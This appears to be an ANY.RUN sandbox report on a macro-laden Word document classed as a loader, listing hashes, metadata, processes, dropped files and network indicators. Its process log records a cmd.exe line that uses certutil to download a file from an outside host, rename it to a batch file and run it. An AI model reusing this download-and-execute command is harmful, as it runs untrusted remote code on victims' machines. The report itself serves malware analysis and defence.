analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc.doc

Full analysis: https://app.any.run/tasks/78a95521-b4c8-46cf-aec8-4df1c9cf3cb0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 17, 2019, 19:48:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 949, Author: YHTRF, Template: Normal.dotm, Last Saved By: YHTRF, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Mon Mar 12 17:48:00 2018, Last Saved Time/Date: Sun Apr 8 16:55:00 2018, Number of Pages: 1, Number of Words: 689, Number of Characters: 3928, Security: 0
MD5:

2614BD5B8177EF93EFAA9B06BEDA2398

SHA1:

94CCD86C19F9BA729805F53BBBF29E695A75A391

SHA256:

A0F53ABDE0D15497776E975842E7DF350D155B8E63D872A914581314AAA9C1DC

SSDEEP:

192:sgvUNMaZEvA+6/6rrILd/Kf3HO8tKq60st7gWtSnhzjnsVYtNS0jwylxttam:sWiSUR/8dKG8Bt+hnsaNS0jwaf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3016)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 3472)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3016)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3016)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3016)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: YHTRF
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: YHTRF
RevisionNumber: 11
Software: Microsoft Office Word
TotalEditTime: 3.0 minutes
CreateDate: 2018:03:12 17:48:00
ModifyDate: 2018:04:08 15:55:00
Pages: 1
Words: 689
Characters: 3928
Security: None
CodePage: Windows Korean (Unified Hangul Code)
Company: -
Lines: 32
Paragraphs: 9
CharCountWithSpaces: 4608
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
3016"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3472C:\Windows\system32\cmd.exe /ccd %TEMP% && certutil -urlcache -split -f http://filer1.1apps.com/1.txt && ren 1.txt 1.bat && 1.batC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2149122452
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4064certutil -urlcache -split -f http://filer1.1apps.com/1.txt C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2149122452
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 061
Read events
689
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
3
Unknown types
3

Dropped files

PID
Process
Filename
Type
3016WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8B8D.tmp.cvr
MD5:
SHA256:
3016WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFFEB734B947A10D49.TMP
MD5:
SHA256:
3016WINWORD.EXEC:\Users\admin\Desktop\~WRD0000.tmpdocument
MD5:A08CAB715F69E3E2353A5384EAF7369A
SHA256:E47DD0D0CD694CE6142F68A40A408E89E8829259A35369E527AF1CC2DB785BF8
3016WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:AEEDAE30622970AE709618C936BCC338
SHA256:6CADC894CD7157BBFE765E0AB85D7C2BE31AC132CCAF6B885C65B159F5A12793
3016WINWORD.EXEC:\Users\admin\Desktop\a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc.docdocument
MD5:38E151C737ABF353CA7C39F5CD4C1EDD
SHA256:DA4A5CCCD350105D59549FFA56A6858D5D9EC93DB24EF6417604C769867B354A
3016WINWORD.EXEC:\Users\admin\Desktop\~$f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc.docpgc
MD5:632D99BDE70D57671E6F7F45888BC26F
SHA256:0AC22EC82DF30FE13EA2CCAAB4BCBCDFBB4A495AA7939EA9BC24AE9E4D424FCF
3016WINWORD.EXEC:\Users\admin\Desktop\~WRL0001.tmpdocument
MD5:2614BD5B8177EF93EFAA9B06BEDA2398
SHA256:A0F53ABDE0D15497776E975842E7DF350D155B8E63D872A914581314AAA9C1DC
3016WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F015D210322BD714CD5185B0B2821130
SHA256:AD9526B6DB088134D3048C845668B9B8562E9667CDD41036589E6AE01D2BBC45
3016WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc.doc.LNKlnk
MD5:40680D3687572F30D7939C84E75A969A
SHA256:0EDE8E5119843E903EB7A5317C772552D9C695EC6E07C578A99909CB8E84AEBB
4064certutil.exeC:\Users\admin\AppData\Local\Temp\1.txthtml
MD5:5343C1A8B203C162A3BF3870D9F50FD4
SHA256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4064
certutil.exe
GET
404
88.99.13.69:80
http://filer1.1apps.com/1.txt
DE
html
1.22 Kb
malicious
4064
certutil.exe
GET
404
88.99.13.69:80
http://filer1.1apps.com/1.txt
DE
html
1.22 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4064
certutil.exe
88.99.13.69:80
filer1.1apps.com
Hetzner Online GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
filer1.1apps.com
  • 88.99.13.69
malicious

Threats

PID
Process
Class
Message
4064
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
1 ETPRO signatures available at the full report
No debug info